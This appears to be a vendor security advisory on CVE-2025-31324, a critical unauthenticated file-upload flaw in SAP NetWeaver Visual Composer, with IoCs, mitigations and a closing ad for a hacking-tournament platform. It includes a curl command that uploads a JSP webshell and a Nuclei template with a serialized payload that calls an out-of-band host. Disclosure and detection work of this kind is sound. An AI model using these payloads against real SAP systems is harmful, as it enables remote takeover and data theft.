CVE-2025-31324: Remote Code Execution in SAP NetWeaver Visual Composer
Introduction
CVE-2025-31324, published on April 24, 2025, on the NVD, is a critical flaw in the Metadata Uploader component of SAP NetWeaver Visual Composer. Initially identified by ReliaQuest on April 22, 2025, as reported in their blog, it allows unauthenticated attackers to upload malicious files, resulting in remote code execution (RCE).
With a CVSS 3.1 score of 10.0, the vulnerability has a severe impact, potentially leading to the complete compromise of the confidentiality, integrity, and availability of affected systems. Evidence of active exploitation since January 20, 2025, as documented by Onapsis, characterizes it as a zero-day vulnerability. CISA included the flaw in its Known Exploited Vulnerabilities Catalog on April 29, 2025, reinforcing the urgency of mitigation.
Affected Versions
The vulnerability affects the SAP Visual Composer (VCFRAMEWORK) component in all versions of SAP NetWeaver 7.xx (all Support Packs – SPS), which operates on the NetWeaver Java stack.
Specifically, the vulnerable component is the Metadata Uploader, present at the /developmentserver/metadatauploader endpoint. Although Visual Composer is not installed by default, it is widely enabled, with estimates suggesting that 50% to 70% of NetWeaver Java systems are potentially vulnerable, according to Hackread.
Table of Affected Versions
| Product | Version | Affected Component | Notes |
|---|---|---|---|
| SAP NetWeaver | 7.xx (all SPS) | Visual Composer (Metadata Uploader) | Requires VCFRAMEWORK component installed |
Technical Details
The flaw lies in the Metadata Uploader component, which does not validate the identity or permissions of the user when processing upload requests at the /developmentserver/metadatauploader endpoint. This allows unauthenticated attackers to send executable files, such as JSP webshells, to publicly accessible directories, resulting in RCE.
Exploitation Process
The attack occurs via HTTP/POST requests to the /developmentserver/metadatauploader endpoint. An attacker can send a malicious file, such as a JSP webshell, which is stored in directories such as /usr/sap//j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root.
A hypothetical example of exploitation using curl would be:
curl -X POST -F "file=@webshell.jsp" http://<target>/developmentserver/metadatauploader/developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1
After the upload, the webshell can be accessed via a GET request at http://<target>/irj/webshell.jsp, allowing the execution of arbitrary commands on the server.
Public Exploits
Although full exploits are not widely available, the ease of detection and exploitation of the vulnerability serves as a warning to organizations.
Onapsis has made an open-source scanner available on GitHub to check for the presence of the vulnerable component, patch status, and known webshells. RedRays also published a scanner that detects the vulnerability and malicious files.
Additionally, a Nuclei template for the CVE is already available, allowing for mass detection of currently vulnerable applications.
id: CVE-2025-31324
info:
name: SAP NetWeaver Visual Composer Metadata Uploader - Deserialization
author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
severity: critical
description: |
SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.
reference:
- https://www.bleepingcomputer.com/news/security/sap-fixes-suspected-netweaver-zero-day-exploited-in-attacks/
- https://www.theregister.com/2025/04/25/sap_netweaver_patch/
- https://me.sap.com/notes/3594142
- https://url.sap/sapsecuritypatchday
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2025-31324
cwe-id: CWE-434
epss-score: 0.00043
epss-percentile: 0.12532
metadata:
verified: true
max-request: 1
shodan-query: html:"SAP NetWeaver Application Server Java"
tags: cve,cve2025,sap,netweaver,rce,deserialization
variables:
oast: ".{{interactsh-url}}"
payload: "{{padding(oast,'a',54,'prefix')}}"
http:
- raw:
- |
POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data
{{zip('.properties',replace(base64_decode('rO0ABXNyABRqYXZhLnV0aWwuUHJvcGVydGllczkS0HpwNj6YAgABTAAIZGVmYXVsdHN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHIAE2phdmEudXRpbC5IYXNodGFibGUTuw8lIUrkuAMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAADdwgAAAAFAAAAAnQADnByb2plY3QtbmF0dXJlc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAADHcIAAAAEAAAAAFzcgAMamF2YS5uZXQuVVJMliU3Nhr85HIDAAdJAAhoYXNoQ29kZUkABHBvcnRMAAlhdXRob3JpdHl0ABJMamF2YS9sYW5nL1N0cmluZztMAARmaWxlcQB+AAhMAARob3N0cQB+AAhMAAhwcm90b2NvbHEAfgAITAADcmVmcQB+AAh4cP//////////dAA2YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhdAAAcQB+AAp0AARodHRwcHh0AD1odHRwOi8vYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFheHQAC0VYUE9SVC1OQU1FdAATc29tZV9wcm9qZWN0X25hbWV4eHhw'),'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',payload))}}
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, 'dns')
- contains_all(body, 'FAILED', 'Cause')
condition: and
# digest: 4a0a00473045022100f5b505da6330ce6f914842169ea999457eb6ccd6702d7f10011b8b67aabd107b02203d3504d0f406612d5ccbdde93d7c452e029e4393550688a47e9410d9ce68425a:922c64590222798bb761d5b6d8e72950
Indicators of Compromise (IoCs)
Onapsis identified the following IoCs to detect compromised systems:
Suspicious files:
.jsp,.java, or.classfiles in/usr/sap/<SID>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root,/workor/work/sync.Known hashes:
helper.jsp: SHA-256 1f72bd2643995fab4ecf7150b6367fa1b3fab17afd2abed30a98f075e4913087cache.jsp: SHA-256 794cb0a92f51e1387a6b316b8b5ff83d33a51ecf9bf7cc8e88a619ecb64f1dcfFiles with random 8 character names (example: [a-z]{8}.jsp): SHA-256 b3e4c4018f2d18ec93a62f59b5f7341321aff70d08812a4839b762ad3ade74ee
Exploitation Requirements
Endpoint: Access to the /developmentserver/metadatauploader endpoint via HTTP/HTTPS, with no authentication required.
MITRE ATT&CK Tactics: T1190 (Exploit Public-Facing Application), T1505.003 (Server Software Component: Web Shell).
Mitigations
Official Patch
SAP released an emergency patch in SAP Security Note 3594142, available to customers on the support portal. Immediate application of the patch is the recommended solution to eliminate the vulnerability.
Temporary Measures
While the patch is not yet applied, the following actions can reduce risk:
Restrict Access: Configure firewall rules or use SAP security features to block requests to the /developmentserver/metadatauploader endpoint.
Disable Visual Composer: If the component is not essential, disable it to eliminate the attack surface.
Monitoring and Detection: Forward logs to a SIEM system and scan directories such as
/usr/sap/<SID>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/rootfor unauthorized files, verifying the mentioned hashes.
Conclusion
CVE-2025-31324 represents a critical threat due to its ability to allow full control over SAP NetWeaver systems without authentication, with active exploitation confirmed since January 2025. Its inclusion in the CISA Known Exploited Vulnerabilities Catalog and its CVSS 10.0 score highlight the need for immediate action. Organizations should prioritize applying the patch from SAP Security Note 3594142, implement temporary measures, and monitor systems for signs of compromise.
If you want to test the security of your systems in a practical and effective way, we invite you to host a hacking tournament on Bypassec, a gamified platform with more than 100 ethical hackers ready to identify vulnerabilities in your environment.
References
BleepingComputer - SAP fixes suspected NetWeaver zero-day exploited in attacks
Onapsis - Active Exploitation of SAP Zero-Day Vulnerability (CVE-2025-31324)
ReliaQuest - Threat Spotlight: ReliaQuest Uncovers Vulnerability Behind SAP NetWeaver Compromise
Hackread - SAP NetWeaver Flaw Exploited to Deploy Web Shells
